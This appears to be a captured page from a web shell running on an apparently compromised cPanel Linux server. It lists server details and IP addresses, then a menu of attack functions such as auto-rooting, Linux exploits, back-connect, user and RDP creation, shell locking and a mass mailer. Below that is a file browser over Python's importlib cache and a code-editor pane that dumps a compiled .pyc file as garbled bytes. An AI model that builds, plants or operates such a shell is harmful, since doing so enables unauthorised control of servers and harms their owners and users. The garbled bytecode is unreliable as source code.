Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.214.78
138 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
importlib /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
3.72
KB
-rw-r--r--
_abc.cpython-310.pyc
1.92
KB
-rw-r--r--
_adapters.cpython-310.pyc
3.62
KB
-rw-r--r--
_bootstrap.cpython-310.pyc
29.42
KB
-rw-r--r--
_bootstrap_external.cpython-31...
43.27
KB
-rw-r--r--
_common.cpython-310.pyc
2.9
KB
-rw-r--r--
abc.cpython-310.pyc
15.52
KB
-rw-r--r--
machinery.cpython-310.pyc
944
B
-rw-r--r--
readers.cpython-310.pyc
5.06
KB
-rw-r--r--
resources.cpython-310.pyc
5.24
KB
-rw-r--r--
util.cpython-310.pyc
9.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _common.cpython-310.pyc
o }�5h� � @ s� d dl Z d dlZd dlZd dlZd dlZd dlZd dlZd dlmZm Z m Z ddlmZm Z ddlmZ eejef Zdd� Zdd � Zd d� Zdd � Zdd� Zdd� Zejde jd�dd��Zejdd� �Ze�ej�ejdd� ��Z dS )� N)�Union�Any�Optional� )�ResourceReader�Traversable)� wrap_specc C s t t| ��S )z3 Get a Traversable resource from a package )�from_package�get_package)�package� r �(/usr/lib/python3.10/importlib/_common.py�files s r c C s. t | �}tj�|�\}}|rt| �d���|S )z�Normalize a path by ensuring it is a string. If the resulting string contains path separators, an exception is raised. z must be only a file name)�str�os�path�split� ValueError)r �str_path�parent� file_namer r r �normalize_path s r c C s* | j }t|jdd�}|du rdS ||j�S )z? Return the package's loader if it's a ResourceReader. �get_resource_readerN)�__spec__�getattr�loader�name�r �spec�readerr r r r &